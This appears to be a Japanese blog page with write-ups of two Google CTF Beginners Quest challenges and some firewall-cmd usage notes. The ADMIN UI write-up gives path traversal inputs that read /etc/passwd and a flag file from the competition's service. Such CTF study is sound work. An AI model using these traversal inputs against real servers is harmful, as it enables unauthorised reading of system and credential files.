2018/11/17

Google CTF Beginners Quest ADMIN UI

$ nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit

問題文の通りにアクセスする。フラグ入手に利用するメニューは2) Read EULA/patch notes

=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
2
The following patchnotes were found:
 - Version0.2
 - Version0.3
Which patchnotes should be shown?
Version0.2
# Release 0.2
 - Updated library X to version 0.Y
 - Fixed path traversal bug
 - Improved the UX
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
2
The following patchnotes were found:
 - Version0.2
 - Version0.3
Which patchnotes should be shown?
Version0.3
# Version 0.3
 - Rollback of version 0.2 because of random reasons
 - Blah Blah
 - Fix random reboots at 2:32 every second Friday when it's new-moon.

Version0.2の、Fixed path traversal bugがヒントになっており、このシステムはpath traversalが可能。

=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
2
The following patchnotes were found:
 - Version0.2
 - Version0.3
Which patchnotes should be shown?
../../../../../etc/passwd

----- snip -----

user:x:1337:1337::/home/user:

/etc/passwdのうち、一般ユーザはuserのみ。

Which patchnotes should be shown?
../../../../home/user/flag
CTF{DUMMY_FLAG}=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit

勘に頼り/home/user以下を探索したところ/home/user/flagよりフラグを得た。

Google CTF Beginners Quest FLOPPY

$ file foo.ico
foo.ico: MS Windows icon resource - 1 icon, 32x32, 16 colors

ico fileが与えられる。画像自体に気になる点は無いため、バイナリエディタで内容を確認。

データ後半にzipを示すマジックナンバーPKが存在しdriver.txt等のzipらしい文字列も続くため、PK以下全データを新規ファイルとして保存しunzip。

$ unzip foo.zip
Archive:  foo.zip
  inflating: driver.txt
  inflating: www.com

driver.txtの内容がフラグとなる。

firewall-cmd usage

http service(port 80/tcp)の通信を許可した際の履歴。zoneにserviceが紐付いている。

$ firewall-cmd --get-active-zone
public
  interfaces: enp0s3

$ firewall-cmd --info-zone public
public (active)
  target: default
  icmp-block-inversion: no
  interfaces: enp0s3
  sources:
  services: ssh dhcpv6-client
  ports:
  protocols:
  masquerade: no
  forward-ports:
  source-ports:
  icmp-blocks:
  rich rules:

$ firewall-cmd --get-services
RH-Satellite-6 amanda-client amanda-k5-client bacula bacula-client bitcoin bitcoin-rpc bitcoin-testnet bitcoin-testnet-rpc ceph ceph-mon cfengine condor-collector ctdb dhcp dhcpv6 dhcpv6-client dns docker-registry dropbox-lansync elasticsearch freeipa-ldap freeipa-ldaps freeipa-replication freeipa-trust ftp ganglia-client ganglia-master high-availability http https imap imaps ipp ipp-client ipsec iscsi-target kadmin kerberos kibana klogin kpasswd kshell ldap ldaps libvirt libvirt-tls managesieve mdns mosh mountd ms-wbt mssql mysql nfs nfs3 nrpe ntp openvpn ovirt-imageio ovirt-storageconsole ovirt-vmconsole pmcd pmproxy pmwebapi pmwebapis pop3 pop3s postgresql privoxy proxy-dhcp ptp pulseaudio puppetmaster quassel radius rpc-bind rsh rsyncd samba samba-client sane sip sips smtp smtp-submission smtps snmp snmptrap spideroak-lansync squid ssh synergy syslog syslog-tls telnet tftp tftp-client tinc tor-socks transmission-client vdsm vnc-server wbem-https xmpp-bosh xmpp-client xmpp-local xmpp-server

$ firewall-cmd --info-service http
http
  ports: 80/tcp
  protocols:
  source-ports:
  modules:
  destination:

$ firewall-cmd --zone=public --add-service=http
success
$ firewall-cmd -–reload
success